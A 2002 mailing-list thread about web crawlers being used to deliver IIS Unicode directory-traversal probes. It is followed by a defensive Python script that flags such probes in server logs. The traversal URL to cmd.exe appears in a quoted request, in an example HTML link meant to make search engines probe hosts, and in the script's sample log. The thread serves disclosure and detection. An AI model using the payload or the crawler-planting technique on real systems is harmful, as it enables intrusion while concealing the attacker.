[unisog] A new way to look for exploits

Patrick Aland paland at stetson.edu
Thu Mar 14 18:30:01 GMT 2002


There was an article in the last phrack about using search engines to
scan hosts.

For instance if I make a document that contains:


<a
href=http://yourdomain/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe>Link</a>

When a search engine comes along and indexes it, it will try to follow that link
and thus attempt to exploit your system. The phrack article took it a
bit farther by having it drop a payload, etc.

If you make a file containing a ton of links to separate IPs it will probe
them for you.

You may want to check it out. I think it was in Phrack 57, Rise of the
Robots or something.


On Thu, Mar 14, 2002 at 10:30:08AM -0500, John E. Tysko wrote:
> 
>  Recently, I noticed several of our machines being scanned by
> alexa.com, presumably for the web archive services provided by
> archive.org. Several requests for interesting web pages came
> to my attention, and one of the latest from yesterday looked 
> like this: 2 connections, the first, a polite:
> 
>    GET /robots.txt HTTP/1.0
>    Connection: close
>    Host: 132.235.16.144
>    User-Agent: ia_archiver
>    From: crawler at alexa.com
> 
> and the second, an interesting:
> 
>    GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.0
>    Connection: close
>    Host: 132.235.x.x
>    User-Agent: ia_archiver
>    From: crawler at alexa.com
> 
> 
> It would seem there is a new way to probe for security holes
> without giving away your ip.
> 
> Is this unique to our machines, or has anyone else seen this?
> 
> John
> 
>   John Tysko                                      
>   Systems Administrator                           
>   Electrical Engineering and Computer Science     
>   Ohio University, Athens Oh 45701                
> 

-- 
------------------------------------------------------------
 Patrick Aland                          paland at stetson.edu
 Network Administrator                  Voice: 386.822.7217
 Stetson University                     Fax: 386.822.7367
------------------------------------------------------------
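A defender-side check for the kind of request John quoted, added here as an example and not part of the original thread or of any project discussed in it. It parses Apache-style access log lines, decodes the request path (mapping the overlong %c0%af form to '/' the way an unpatched server would, while strict UTF-8 would reject it), flags any request whose decoded path climbs above the web root, and marks whether the client identified itself as an indexing robot, since in that case the client IP belongs to the robot and the lead worth chasing is the page that planted the link. The log lines, the 192.0.2.10 client address and the Googlebot marker are constructed for this example; only the ia_archiver agent and the traversal path come from the thread.

```python
"""Flag directory-traversal probes in web server logs, including ones that
arrive via a search-engine crawler that followed a planted link."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_to_bytes

# User-Agent substrings of indexing robots. ia_archiver is the one seen in the
# thread; Googlebot is a real crawler added here as an assumption of what an
# administrator would also want to recognise.
CRAWLER_UA_MARKERS = ("ia_archiver", "Googlebot")

# Apache combined log format; constructed for this example.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (192.0.2.10 is a documentation-range placeholder
# standing in for the crawler's address; the probe path is the one from the thread).
SAMPLE_LOG = """\
192.0.2.10 - - [13/Mar/2002:09:12:01 -0500] "GET /robots.txt HTTP/1.0" 200 120 "-" "ia_archiver"
192.0.2.10 - - [13/Mar/2002:09:12:02 -0500] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe HTTP/1.0" 404 300 "-" "ia_archiver"
192.0.2.10 - - [13/Mar/2002:09:15:10 -0500] "GET /docs/../index.html HTTP/1.0" 200 2048 "-" "Mozilla/4.0"
"""


def lenient_decode(raw: bytes) -> Tuple[str, bool]:
    """Decode bytes the way a forgiving (unpatched) server would: an overlong
    two-byte sequence such as C0 AF is mapped to the ASCII character it encodes
    ('/'). Returns the decoded text and whether any overlong form was present."""
    out = []
    overlong = False
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            # Overlong 2-byte encoding of a 7-bit character: always invalid UTF-8.
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            overlong = True
            i += 2
        elif b < 0x80:
            out.append(chr(b))
            i += 1
        else:
            # Any other non-ASCII byte: keep it as an escape so the path stays printable.
            out.append("\\x%02x" % b)
            i += 1
    return "".join(out), overlong


def escapes_root(path: str) -> bool:
    """True if resolving the '..' segments of a decoded path climbs above the web root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def analyze_line(line: str) -> Optional[Dict]:
    """Parse one log line and describe it; None if the line does not match the format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    decoded, overlong = lenient_decode(unquote_to_bytes(m["path"]))
    via_crawler = any(marker in m["ua"] for marker in CRAWLER_UA_MARKERS)
    traversal = escapes_root(decoded.split("?", 1)[0])
    return {
        "client": m["client"],
        "path": m["path"],
        "decoded": decoded,
        "overlong_utf8": overlong,
        "traversal": traversal,
        "via_crawler": via_crawler,
        # For a crawler-delivered probe the client IP is the robot's, not the
        # planter's; the useful lead is whichever page linked to this URL.
        "follow_up": "locate the page linking to this URL" if (traversal and via_crawler) else "",
    }


def analyze_log(text: str) -> List[Dict]:
    """Return a finding for every line whose decoded path escapes the web root."""
    findings = []
    for line in text.splitlines():
        f = analyze_line(line)
        if f and f["traversal"]:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding)
```

The third sample line contains a harmless "/docs/../index.html" and is not flagged, because the check resolves segments rather than matching on ".." alone; the second is flagged both for escaping the root and for the overlong encoding, and its crawler User-Agent is recorded so the administrator knows not to treat the robot's address as the source.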
